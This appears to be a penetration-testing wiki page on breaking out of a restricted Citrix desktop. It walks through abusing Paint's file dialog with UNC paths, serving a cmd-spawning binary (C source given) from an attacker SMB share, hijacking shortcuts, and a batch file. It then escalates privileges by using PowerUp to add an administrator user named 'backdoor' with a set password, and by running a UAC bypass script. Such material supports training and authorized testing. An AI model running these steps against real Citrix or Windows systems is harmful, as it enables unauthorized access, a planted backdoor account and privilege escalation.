Citrix Breakout

Basic Methodology for break-out:

  1. Gain access to a Dialog Box.

  2. Exploit the Dialog Box to achieve command execution.

  3. Escalate privileges to gain higher levels of access.

Gaining a shell

Bypassing Path Restrictions

There are multiple ways to open dialog box in windows using tools such as Paint, Notepad, Wordpad, etc. We will cover using MS Paint as an example for this section.

Run Paint from start menu and click on File > Open to open the Dialog Box.

With the windows dialog box open for paint, we can enter the UNC path \127.0.0.1\c$\users\pmorgan under the File name field, with File-Type set to All Files and upon hitting enter we gain access to the desired directory.

Accessing SMB share from restricted environment

Start our smb server

smbserver.py -smb2support share $(pwd)

Create a malicious file

The executable pwn.exe is a custom compiled binary from pwn.c file which upon execution opens up the cmd.

#include <stdlib.h>
int main() {
  system("C:\\Windows\\System32\\cmd.exe");
}

Upload the file

Back in the Citrix environment, initiate the "Paint" application via the start menu. Proceed to navigate to the "File" menu and select "Open", thereby prompting the Dialog Box to appear. Within this Windows dialog box associated with Paint, input the UNC path as \10.13.38.95\share into the designated "File name" field. Ensure that the File-Type parameter is configured to "All Files." Upon pressing the "Enter" key, entry into the share is achieved.

Due to the presence of restrictions within the File Explorer, direct file copying is not viable. Nevertheless, an alternative approach involves right-clicking on the executables and subsequently launching them.

Right-click on the pwn.exe binary and select Open, which should prompt us to run it and a cmd console will be opened.

Modify existing shortcut file

Unauthorized access to folder paths can also be achieved by modifying existing Windows shortcuts and setting a desired executable's path in the Target field. The following steps outline the process:

  1. Right-click the desired shortcut.

  2. Select Properties.

  1. Within the Target field, modify the path to the intended folder for access.

  1. Execute the Shortcut and cmd will be spawned

Script Execution

  1. Create a new text file and name it "evil.bat".

  2. Open "evil.bat" with a text editor such as Notepad.

  3. Input the command "cmd" into the file.

  1. Save the file.

Upon executing the "evil.bat" file, it will initiate a Command Prompt window. This can be useful for performing various command-line operations.

Privilege Escalation

PowerUp

We can make use of PowerUp, using it's Write-UserAddMSI function. This function facilitates the creation of an .msi file directly on the desktop.

Import-Module .\PowerUp.ps1
Write-UserAddMSI

Now we can execute UserAdd.msi and create a new user backdoor:T3st@123 under Administrators group. Note that giving it a password that doesn’t meet the password complexity criteria will throw an error.

Back in CMD execute runas to start command prompt as the newly created backdoor user.

runas /user:backdoor cmd

Bypassing UAC

Even though the newly established user backdoor is a member of Administrators group, accessing the C:\users\Administrator directory remains unfeasible due to the presence of User Account Control (UAC).

Numerous UAC bypass scripts are available, designed to assist in circumventing the active User Account Control (UAC) mechanism. These scripts offer methods to navigate past UAC restrictions and gain elevated privileges.

Import-Module .\Bypass-UAC.ps1
Bypass-UAC -Method UacMethodSysprep
PreviousPillagingNextLinux

Last updated